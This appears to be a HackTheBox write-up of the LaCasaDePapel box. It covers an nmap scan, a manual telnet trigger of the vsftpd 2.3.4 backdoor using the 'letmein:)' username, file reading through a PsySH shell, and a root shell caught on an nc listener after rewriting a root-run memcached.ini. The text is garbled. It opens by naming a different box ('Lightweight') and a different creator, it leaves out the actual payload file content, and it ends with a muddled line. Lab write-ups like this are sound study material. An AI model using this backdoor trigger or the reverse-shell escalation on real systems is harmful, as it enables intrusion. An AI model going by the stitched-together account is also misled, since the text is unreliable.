Lightweight,a Linux box created by HackTheBox user thek, was an overall easy difficulty box.the login shell was changed to psysh so I couldn’t use the vsftpd exploit to get a full shell on the box. LaCasaDePapel has some typical HTB elements: scavenger hunt for SSH keys, base64 encoding and a cronjob running as root for final priv esc.
# nmap 10.10.10.131 -A Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-09 02:27 EDT Nmap scan report for 10.10.10.131 Host is up (0.083s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 22/tcp open ssh OpenSSH 7.9 (protocol 2.0) | ssh-hostkey: | 2048 03:e1:c2:c9:79:1c:a6:6b:51:34:8d:7a:c3:c7:c8:50 (RSA) | 256 41:e4:95:a3:39:0b:25:f9:da:de:be:6a:dc:59:48:6d (ECDSA) |_ 256 30:0b:c6:66:2b:8f:5e:4f:26:28:75:0e:f5:b1:71:e4 (ED25519) 80/tcp open http Node.js (Express middleware) |_http-title: La Casa De Papel 443/tcp open ssl/http Node.js Express framework | http-auth: | HTTP/1.1 401 Unauthorized\x0D |_ Server returned status 401 but no WWW-Authenticate header. | ssl-cert: Subject: commonName=lacasadepapel.htb/organizationName=La Casa De Papel | Not valid before: 2019-01-27T08:35:30 |_Not valid after: 2029-01-24T08:35:30 | tls-alpn: |_ http/1.1
The website on either port 80 nor 443 presented us with anything useful. 80 allowed us to register an account but the confirmation email was not sent and port 443 expected a client certificate.
Instead vsftpd is interesting, there is a known backdoor for that version. There are existing exploits released for this but the last step always failed so I did this manually:
1 2 3 4 5 6 7 8
$ telnet 10.10.10.131 21 Trying 10.10.10.131... Connected to 10.10.10.131. Escape character is '^]'. 220 (vsFTPd 2.3.4) USER letmein:) 331 Please specify the password. PASS please
After that we can connect to the backdoor on port 6200. But we are not granted a normal shell, instead it’s a Psy Shell. It still allows us to read local files, so we get /etc/passwd and it also gave us the CA key required for a client certificate:
lacasadepapel [~]$ id uid=1002(professor) gid=1002(professor) groups=1002(professor)
Professor’s home directory has interesting permissions, it has the SGID bit set.
Now after a while trying to figure out the privilege escalation we’ve noticed that the process ID of /usr/bin/node /home/professor/memcached.js keeps changing, so this service is constantly restarted.
As those files are in our home directory and we have write privileges to the folder in which those files are stored, we can simply move them away and create new files. We’ve created memcached.ini.new with the content: memcached.ini
nc -lvnp 4444 Ncat: Version 7.70 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.131. Ncat: Connection from 10.10.10.131:43525. id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video) cd /root ls root.txt cat root.txt 586979....
So we have root. and we can read user.txt with root.txt permission